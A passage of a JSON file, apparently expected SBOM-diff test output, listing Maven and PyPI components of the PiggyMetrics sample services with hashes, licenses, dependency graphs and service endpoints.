"A StAX implementation for JSON.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\codehaus\\jettison\\jettison\\1.3.7\\jettison-1.3.7.jar"}]}}, "group": "org.codehaus.jettison", "hashes": [{"alg": "SHA-512", "content": 
"1304499b9951cba15f10486a061d91ec91efec7aa039162d5fa3d4effb60596fd1c73152fa46d170bbe065d98718f4c9354403bcee7aa3acd03d7b03aa45eeee"}, {"alg": "SHA-384", "content": "4cf5155094f09370f72e94768d6f1429662fb6dcfe6df00f91d78977d42a61dd62d51f1464d3d79eb7363ded95f53474"}, {"alg": "SHA3-384", "content": "5e88aeeb907a6b304a2125a01b55549633b64ce7a43469eff7fdb82ad9e3dfe2e48696c8fd184b2cec6e6062dd1079eb"}, {"alg": "SHA-1", "content": "7d36a59a0577f11b12088b9e215d6860345b9e1d"}, {"alg": "SHA-256", "content": "b39e77d92f5a682c639c8962980499e6be34b5c9fda7ad4dba3b5fd9e99b5070"}, {"alg": "MD5", "content": "c1ce879e927ca435da0fd2fd6c8a6b60"}, {"alg": "SHA3-512", "content": "c75a5dc446297a1eaac02f36829ea2891ffa5e9a3ca45a888f935d8cd65e6f3cab9c6410b45b36987c23674c243b9d6f0d4371f9efec92b70b92a4355732c329"}, {"alg": "SHA3-256", "content": "e8c94791fa652fbc24dbd55ce3fb3ad3cc703d576f935a4b4d2710148615cf9c"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jettison", "purl": "pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar", "scope": "required", "version": "1.3.7"}, {"bom-ref": "pkg:maven/stax/stax-api@1.0.1?type=jar", "type": "library", "description": "StAX API is the standard java XML processing API defined by JSR-173", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\stax\\stax-api\\1.0.1\\stax-api-1.0.1.jar"}]}}, "group": "stax", "hashes": [{"alg": "SHA3-384", "content": "03ebb8db88d04b7308570c1058aadfb6a81d3d6725b1dd13a049ea984ed1df42d3e0f8163e1229752228cada978fb462"}, {"alg": "SHA-384", "content": "2e6c232d3012064dc17e10c2e5b281728a6771eb0d74868e730caf60fe6f96fdd6145759fbbf9d1aa2e07eb1f49764d6"}, {"alg": "SHA-512", "content": "43c24e8dbffa9b932492c8ccf2b91926b2ba3d1d34b5a9671c689bd24d4c220b996708a9667521641d1abbf29404b653755b6f6f3dc0ad0671f5c09db332ea06"}, {"alg": "SHA-1", "content": "49c100caf72d658aca8e58bd74a4ba90fa2b0d70"}, 
{"alg": "MD5", "content": "7d436a53c64490bee564c576babb36b4"}, {"alg": "SHA3-256", "content": "8173e3e3a0db17b3dbb80c017268858ecda57c819e5b58dbe202bd8087664bb1"}, {"alg": "SHA-256", "content": "d1968436fc216c901fb9b82c7e878b50fd1d30091676da95b2edd3a9c0ccf92e"}, {"alg": "SHA3-512", "content": "e9a7c234dfeff5d4cabd034a536f31ad5a141e30b0ad2438cf5856dd6c36eeb16c69b8bc1ba3ee6bba91f69cd3cbd450953249f2f0eee0a9a22d49637b575f4d"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "stax-api", "purl": "pkg:maven/stax/stax-api@1.0.1?type=jar", "scope": "required", "version": "1.0.1"}]}, "dependencies": [{"ref": "pkg:maven/ch.qos.logback/logback-classic@1.2.3?type=jar", "dependsOn": ["pkg:maven/ch.qos.logback/logback-core@1.2.3?type=jar", "pkg:maven/org.slf4j/slf4j-api@1.7.25?type=jar"]}, {"ref": "pkg:maven/ch.qos.logback/logback-core@1.2.3?type=jar", "dependsOn": []}, {"ref": "pkg:maven/org.apache.logging.log4j/log4j-to-slf4j@2.10.0?type=jar", "dependsOn": ["pkg:maven/org.apache.logging.log4j/log4j-api@2.10.0?type=jar", "pkg:maven/org.slf4j/slf4j-api@1.7.25?type=jar"]}, {"ref": "pkg:maven/org.slf4j/slf4j-api@1.7.25?type=jar", "dependsOn": []}, {"ref": "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework.boot/spring-boot@2.0.3.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework.boot/spring-boot-starter-logging@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/ch.qos.logback/logback-classic@1.2.3?type=jar", "pkg:maven/org.apache.logging.log4j/log4j-to-slf4j@2.10.0?type=jar", "pkg:maven/org.slf4j/jul-to-slf4j@1.7.25?type=jar"]}, {"ref": "pkg:maven/org.springframework.boot/spring-boot@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-context@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "dependsOn": 
["pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-context@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-expression@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-jcl@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-expression@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-jcl@5.0.7.RELEASE?type=jar", "dependsOn": []}], "services": [{"name": "com-piggymetrics-account-controller-AccountController-getAccountByName-service", "endpoints": ["/{name}"], "authenticated": true, "x-trust-boundary": true}, {"name": "com-piggymetrics-account-controller-AccountController-getCurrentAccount-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-account-controller-AccountController-saveCurrentAccount-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-auth-controller-UserController-getUser-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-notification-client-AccountServiceClient-getAccount-service", "endpoints": ["/accounts/{accountName}"]}, {"name": "com-piggymetrics-notification-controller-RecipientController-getCurrentNotificationsSettings-service", "endpoints": ["/current"]}, {"name": 
"com-piggymetrics-notification-controller-RecipientController-saveCurrentNotificationsSettings-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-statistics-client-ExchangeRatesClient-getRates-service", "endpoints": ["/latest"]}]}, "test/sbom-java2.json": {"components": {"frameworks": [{"bom-ref": "pkg:maven/javax.activation/activation@1.1?type=jar", "type": "framework", "description": "JavaBeans Activation Framework (JAF) is a standard extension to the Java platform that lets you take advantage of standard services to: determine the type of an arbitrary piece of data; encapsulate access to it; discover the operations available on it; and instantiate the appropriate bean to perform the operation(s).", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\javax\\activation\\activation\\1.1\\activation-1.1.jar"}]}}, "group": "javax.activation", "hashes": [{"alg": "SHA-256", "content": "2881c79c9d6ef01c58e62beea13e9d1ac8b8baa16f2fc198ad6e6776defdcdd3"}, {"alg": "SHA3-256", "content": "5fb94d2742cc3d44abad42c5d61b9c7464a2ef33bc58b4b5b121d49799123460"}, {"alg": "MD5", "content": "8ae38e87cd4f86059c0294a8fe3e0b18"}, {"alg": "SHA-512", "content": "c0ff5bf3ace7acc1b31fcc109cee48d9eb8f025ae15a31dc91eca760933bdb97c93f05d61e95af1e317859d72e5f179f897f5bf3df0e3810f4212d43bacee4bd"}, {"alg": "SHA-384", "content": "c4ee54d80a2e67e819700051d6cfa01a17631c89f942b8690afb601e491f02d7497fe57bd5c70edfb9b444ae8222b846"}, {"alg": "SHA3-512", "content": "c5e37fe3d9c420a9035f1160eb1d396e94f01851c01c6e2f19f19a221bfc484e63f9660c7377f58aa65246b95a9eb799ac4e6798c0b20f658edf00a4435e1efa"}, {"alg": "SHA3-384", "content": "de0777d2d1d7aad105defb12aed17ef38abfe89db2449c5243fa3c69304ea24dd8df0881330351d0733313e8f7252814"}, {"alg": "SHA-1", "content": "e6cb541461c2834bdea3eb920f1884d1eb508b50"}], "licenses": [{"license": {"id": "CDDL-1.0"}}], "name": 
"activation", "purl": "pkg:maven/javax.activation/activation@1.1?type=jar", "scope": "required", "version": "1.1"}], "libraries": [{"bom-ref": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "type": "library", "description": "Turbine Stream Service", "group": "com.piggymetrics", "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "turbine-stream-service", "purl": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "version": "0.0.1-SNAPSHOT"}]}, "dependencies": [{"ref": "pkg:maven/javax.activation/activation@1.1?type=jar", "dependsOn": []}]}}, "common_summary": {"components": {"libraries": [{"bom-ref": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.9.6?type=jar", "type": "library", "description": "Core Jackson processing abstractions (aka Streaming API), implementation for JSON", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\fasterxml\\jackson\\core\\jackson-core\\2.9.6\\jackson-core-2.9.6.jar"}]}}, "group": "com.fasterxml.jackson.core", "hashes": [{"alg": "SHA3-256", "content": "243fdbf974b456d3d96ac5c0d018c3ff2ba6f8dedeea5510da8eb851f2026efb"}, {"alg": "SHA-1", "content": "4e393793c37c77e042ccc7be5a914ae39251b365"}, {"alg": "SHA-384", "content": "59f87a260de53f8ddabe35749cd8abc71e52ebfeacd51b1e68363fe4bf72e632a7ea3648340969e8fdb0eb90d994fff4"}, {"alg": "SHA3-384", "content": "626fc0c5049dde3d55e7b47a935e735bd0dd4aed80d22ba5ec708d581c710702a4a2f4963a1d7870692a77e05d67fd75"}, {"alg": "SHA3-512", "content": "6944f9effea908ae8564a7a1a951a9c7b6e27e7cc978eac30fb43ddef0870103f669065d4b0df7293d5d541f9bf9e04b0cebbf26fdf0159d1dffb6fa465bc64f"}, {"alg": "SHA-512", "content": "a1b9b68b67d442a47e36b46b37b6b0ad7a10c547a1cf7adb4705baec77356e1080049d310b3b530f66bbd3c0ed05cfe43c041d6ef4ffbbc6731149624df4e699"}, {"alg": "MD5", "content": 
"f3cf83b839fac92307cad542c2ded5c4"}, {"alg": "SHA-256", "content": "fab8746aedd6427788ee390ea04d438ec141bff7eb3476f8bdd5d9110fb2718a"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jackson-core", "publisher": "FasterXML", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.9.6?type=jar", "scope": "required", "version": "2.9.6"}, {"bom-ref": "pkg:maven/org.aspectj/aspectjweaver@1.8.13?type=jar", "type": "library", "description": "The AspectJ weaver introduces advices to java classes", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\aspectj\\aspectjweaver\\1.8.13\\aspectjweaver-1.8.13.jar"}]}}, "group": "org.aspectj", "hashes": [{"alg": "MD5", "content": "4a95811a5b41a038a359c05189de9829"}, {"alg": "SHA3-384", "content": "71b931c9517a44ec80139384581067a8d2ebb642d9bae8ce2ad785e6479a1e380ab9d5d5720582bd7d9e2d33c7322571"}, {"alg": "SHA3-256", "content": "8fc704392325ca3d4597055a9e7780b7e2ada5bf63ca1d60a9bbfbc2c6d8f1df"}, {"alg": "SHA-256", "content": "965d0928b0e07dcedb67f0d0a48653d36a6cff257e3270cb28ea48fef6c30a27"}, {"alg": "SHA-384", "content": "a7aa2b3cbd2abc4264f69e97e70e202c24d8fa2c67376cd1c16731fecee57b518cd41c45c0288e036100c6a7c53750ec"}, {"alg": "SHA-1", "content": "ad94df2a28d658a40dc27bbaff6a1ce5fbf04e9b"}, {"alg": "SHA-512", "content": "be2b21636f7e6786c9c3c50684e522520d6bc0580ce49ff8a9c0fbe422568acbb91fd70dde63a3624098ba10d4e3892f2de0ffaa05f595278d2726b44e6aa576"}, {"alg": "SHA3-512", "content": "e5d1354f72fcaf1018ff248554491077e8037c116ee6f66d98f49f290f17417bb0d73f18775f00717978755ea44533c95d13011217531d065ac3f15b9c582d7a"}], "licenses": [{"license": {"id": "EPL-1.0"}}], "name": "aspectjweaver", "purl": "pkg:maven/org.aspectj/aspectjweaver@1.8.13?type=jar", "scope": "required", "version": "1.8.13"}], "frameworks": [{"bom-ref": "pkg:maven/org.bouncycastle/bcpkix-jdk15on@1.56?type=jar", 
"type": "framework", "description": "The Bouncy Castle Java APIs for CMS, PKCS, EAC, TSP, CMP, CRMF, OCSP, and certificate generation. This jar contains APIs for JDK 1.5 to JDK 1.8. The APIs can be used in conjunction with a JCE/JCA provider such as the one provided with the Bouncy Castle Cryptography APIs.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\bouncycastle\\bcpkix-jdk15on\\1.56\\bcpkix-jdk15on-1.56.jar"}]}}, "group": "org.bouncycastle", "hashes": [{"alg": "MD5", "content": "17b2b704b3ad9b36a6fca1ace60a2a06"}, {"alg": "SHA-1", "content": "4648af70268b6fdb24674fb1fd7c1fcc73db1231"}, {"alg": "SHA-512", "content": "6cbc73005b662440c395d81d44d0f52a3e20550f64be3d4fe413c344257c6ef31f8080421b247273f8be42e724de370b1f1b2f0dae58a47010ef4c890d8cf5b8"}, {"alg": "SHA-256", "content": "7043dee4e9e7175e93e0b36f45b1ec1ecb893c5f755667e8b916eb8dd201c6ca"}, {"alg": "SHA-384", "content": "8147d3692b03ac84ccdd20f8ff7f3d319583434ad1a0178ab31d6433a3ed11c6e05967b26bbaf0420f400a32fb5941c5"}, {"alg": "SHA3-384", "content": "899934416d5f5c3cfe0377b41d1403730c760b6d9edec6079e73a70ec8b92616055c37fb1fee3b227a6dae360cd9cc65"}, {"alg": "SHA3-512", "content": "a6f07a263da0a69665d916d9b41f42d74061630c5ff83e8c407fa3b9aa47708c23a0a3c3c2b9f953af66b60374556c8e89eed2bb7ff3176fc4f603f957f0fffa"}, {"alg": "SHA3-256", "content": "e57c428533d3222b66f93c6bd530ee3bd0e4584c32d5ad50424072f6e8de2d98"}], "licenses": [{"license": {"name": "Bouncy Castle Licence", "url": "http://www.bouncycastle.org/licence.html"}}], "name": "bcpkix-jdk15on", "purl": "pkg:maven/org.bouncycastle/bcpkix-jdk15on@1.56?type=jar", "scope": "required", "version": "1.56"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-context@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Context", "evidence": {"identity": {"confidence": 0.8, "field": 
"purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-context\\2.0.0.RELEASE\\spring-cloud-context-2.0.0.RELEASE.jar"}]}, "occurrences": [{"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\service\\EmailServiceImpl.java#22"}]}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA3-256", "content": "2074e427d7cda1199ef40962370de1dd1b3163c33ce9254a9e0b38a7667dc4bf"}, {"alg": "SHA3-512", "content": "2f05d0c7c31bbac1336e5f37fdcdcdc7bf022a369faaa5c59a2733c8174022a7848492c8faad3fb483c7dce78210cc67465ce68b766b8155652d58d6f206149c"}, {"alg": "SHA-1", "content": "3f0d28344c0dc74eb8594f3f3dd6f82c687be198"}, {"alg": "SHA3-384", "content": "96c8275ce24cc07a8d9311075e667c44a1d9f032993e58be7f9632951a91744b96b118e5db3b0a9882f8d145a7e40f13"}, {"alg": "SHA-384", "content": "96ff50360c1b03d6e225c5975405ce714464cacbbd77896c7841bbf47a14660970b13d2d11d7af1c7396ec4b0e9238e9"}, {"alg": "SHA-256", "content": "abb111a850530a2d9174939f9ef6424efa4abecf978e5625915aa84ea17bb9fe"}, {"alg": "SHA-512", "content": "c5bcf7518bb6bafc311af1e14db61f5fdcdb56e24658da1481e8806e5ad7c897e4def752b9af7d9df1e6cd998300f4f0881593e4b961827c33777c7cbcb6fb44"}, {"alg": "MD5", "content": "e7a4e7275f373c6167b7590591c19efd"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-context", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-context@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": 
"C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-starter-config\\2.0.0.RELEASE\\spring-cloud-starter-config-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA-512", "content": "323078a561ef0cd2ab514801fe8604a3c16b2ae43c1bf92ad32d0abec780e0f9b557a781da1d6a9c56a225e77ef9cca3987246b3f43fbb7a5e2998caab392b8f"}, {"alg": "SHA-1", "content": "42f8c6a92ef1a09239e38a1cf65293ffde1b181c"}, {"alg": "SHA-256", "content": "5342438a378e975b8ecd228eb33f527a96267ab75bd4e5c8a0bbdc729a9f95a9"}, {"alg": "MD5", "content": "5d514c991ae9344ed41c50b6cce19bdc"}, {"alg": "SHA3-512", "content": "6736c58d38d47072eb084233062b0ea96b3b0ff66a4c4e8a4c2f3349d07a7091933abf05fda7a7660474520f7bb75c66d2c98fa9c488f98fe452d5dac132483a"}, {"alg": "SHA3-256", "content": "77acab1bc1c472b4f2d3dbadab3d278c827a967db51a6ca6d2046e1b6fc469f7"}, {"alg": "SHA-384", "content": "d1c7ef45846e4bf3e0b69131d80102d5be8e9413d40a00aebecb4461ef59b06cd52c05ae68777592a9689713b92f64b7"}, {"alg": "SHA3-384", "content": "eb6590405d9ff1dcf6b729bb561230598adf7893d61c1a46c5ae6f65974e3a3550b2b480628b656ea765be6fba9a8102"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-starter-config", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-starter\\2.0.0.RELEASE\\spring-cloud-starter-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA-1", "content": 
"0247ea27d9483e9806f539f6031af135a6a3645f"}, {"alg": "MD5", "content": "4d031dc9879546e189c6c914c19c0542"}, {"alg": "SHA3-512", "content": "5dc4e0e8e5f8e8154aeb362d6018a6d6d3507f4b3d60a3cf51d9ae80e17a9b5a300ff26ac1b508e1ab13c569ae572e94c443e4ca1c92edd48771a7fe5287b1bd"}, {"alg": "SHA-256", "content": "670eedd14018f52145cd58de663739657a19e0e1a7ad965cf7e0a99dd37e84e4"}, {"alg": "SHA-512", "content": "8187b1a499b98e9a2e44bdfa3bca5088ee8034bce371c014b5fd4b1c2240f3447562ba74987b3d91552d45e6c2349942342133ab6bc8e2ba4330257ad63b2f3b"}, {"alg": "SHA-384", "content": "a42de307261711df91fd860690834edf0c28144e820ed8c513c3ec606ffc7728d3ff0496272b55944fbcce4ba7c79675"}, {"alg": "SHA3-256", "content": "d43f97976acafc9bcb47ccece04ef74ab61a6faddfea7ff5cae7c3c1acaedce5"}, {"alg": "SHA3-384", "content": "dba2c320469b2d423fae76fc68a0b57f4d5f7da17f2c7b44c41b7654bbb8395b7e669c538384728e2e65824e8864b501"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-starter", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.security/spring-security-rsa@1.0.5.RELEASE?type=jar", "type": "framework", "description": "Spring Security RSA is a small utility library for RSA ciphers. 
It belongs to the family of Spring Security crypto libraries that handle encoding and decoding text as a general, useful thing to be able to do.", "evidence": {"callstack": {"frames": [{"fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 38, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}, {"column": 16, "fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 41, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}, {"column": 16, "fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 41, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}, {"column": 9, "fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 41, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}]}, "identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\security\\spring-security-rsa\\1.0.5.RELEASE\\spring-security-rsa-1.0.5.RELEASE.jar"}]}}, "group": "org.springframework.security", "hashes": [{"alg": "SHA-1", "content": "31bd1111ada2f455eb0f492ed09e39deda18ca99"}, {"alg": "SHA3-512", "content": "60338f31c9984f232abb52affe0025bb4f8380a71b754d8f5f686360339985d6015f995299d73a8cf4a9eac743cfc9cc141b9de0c672d4743b2740539b497e0a"}, {"alg": "SHA-384", "content": "74af3ef26d098d1c4954e5c4d8cf19391ea1788eaa06cf4d4176d7fd7008d7b34ef594e384c480966cf3e6fd1a57df9e"}, 
{"alg": "MD5", "content": "88d25c857040132ad991af650dcb5e9e"}, {"alg": "SHA-512", "content": "9613e84294a7d0486d6f9529a614526b1b9e37c17c7a1f8c59baa418fe04eb5f09163ef31a7e29b59673bb899bfeaa1d9b99daf91a70dec0a3f761e12da7c284"}, {"alg": "SHA3-384", "content": "ae5b96fd3c5ef3c12bfc91cd6b74fea4d0371ebeed79ff8de1c219b6689ed878c3dde01fb90c34a0163681d234e7a9d2"}, {"alg": "SHA3-256", "content": "cfb4a0c1fee534a26992a7f7adf569b07b5e1190338adf77639afd384c20f2d3"}, {"alg": "SHA-256", "content": "db764286a058f85ac06df00c254afd8d63c618db5abc962a6bdb5f440cb2e5d6"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-security-rsa", "publisher": "SpringSource", "purl": "pkg:maven/org.springframework.security/spring-security-rsa@1.0.5.RELEASE?type=jar", "scope": "required", "version": "1.0.5.RELEASE"}]}, "dependencies": [{"ref": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "dependsOn": ["pkg:maven/org.springframework.boot/spring-boot-starter-test@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-eureka-client@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-turbine-stream@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-stream-rabbit@2.0.0.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework.boot/spring-boot-starter@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/javax.annotation/javax.annotation-api@1.3.2?type=jar", "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.boot/spring-boot-starter-logging@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.boot/spring-boot@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar", "pkg:maven/org.yaml/snakeyaml@1.19?type=jar"]}, {"ref": 
"pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "dependsOn": ["pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.6?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-config-client@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework.boot/spring-boot-starter@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-commons@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-context@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.security/spring-security-rsa@1.0.5.RELEASE?type=jar"]}], "services": [{"name": "com-piggymetrics-account-client-AuthServiceClient-createUser-service", "endpoints": ["/uaa/users"], "authenticated": true, "x-trust-boundary": true}, {"name": "com-piggymetrics-account-client-StatisticsServiceClient-updateStatistics-service", "endpoints": ["/statistics/{accountName}"]}, {"name": "com-piggymetrics-account-controller-AccountController-createNewAccount-service", "endpoints": ["/"]}, {"name": "com-piggymetrics-statistics-controller-StatisticsController-getCurrentAccountStatistics-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-statistics-controller-StatisticsController-getStatisticsByAccountName-service", "endpoints": ["/{accountName}"], "authenticated": true, "x-trust-boundary": true}, {"name": "com-piggymetrics-statistics-controller-StatisticsController-saveAccountStatistics-service", "endpoints": ["/{accountName}"], "authenticated": true, "x-trust-boundary": true}], "bomFormat": "CycloneDX", "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "description": "Turbine Stream Service", "externalReferences": [{"type": "vcs", "url": 
"https://github.com/spring-projects/spring-boot/spring-boot-starter-parent/piggymetrics/turbine-stream-service"}, {"type": "website", "url": "https://projects.spring.io/spring-boot/#/spring-boot-starter-parent/piggymetrics/turbine-stream-service"}], "group": "com.piggymetrics", "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "turbine-stream-service", "purl": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "type": "library", "version": "0.0.1-SNAPSHOT"}, "tools": {"components": [{"author": "OWASP Foundation", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "type": "application"}]}}, "specVersion": "1.5", "version": 3}}, "result_5": {"diff_summary": {"bom_1.json": {}, "bom_2.json": {}}, "common_summary": {"components": {"libraries": [{"bom-ref": "pkg:pypi/requests@2.31.0", "type": "library", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "/home/runner/work/src_repos/python/django-goat/requirements_tests.txt"}]}}, "name": "requests", "properties": [{"name": "SrcFile", "value": "/home/runner/work/src_repos/python/django-goat/requirements_tests.txt"}], "purl": "pkg:pypi/requests@2.31.0", "version": "2.31.0"}]}}}, "result_6": {"test/sbom-python.json": {"components": [{"version": "1.0.1"}, {"version": "2.11.3"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "name": "MarkupSafe", "purl": "pkg:pypi/markupsafe@1.1.1", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "name": "itsdangerous", "purl": "pkg:pypi/itsdangerous@1.1.0", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "name": "click", "purl": "pkg:pypi/click@7.1.2", "version": "7.1.2"}], "dependencies": [{"ref": "pkg:pypi/itsdangerous@1.1.0"}, {"ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "services": 
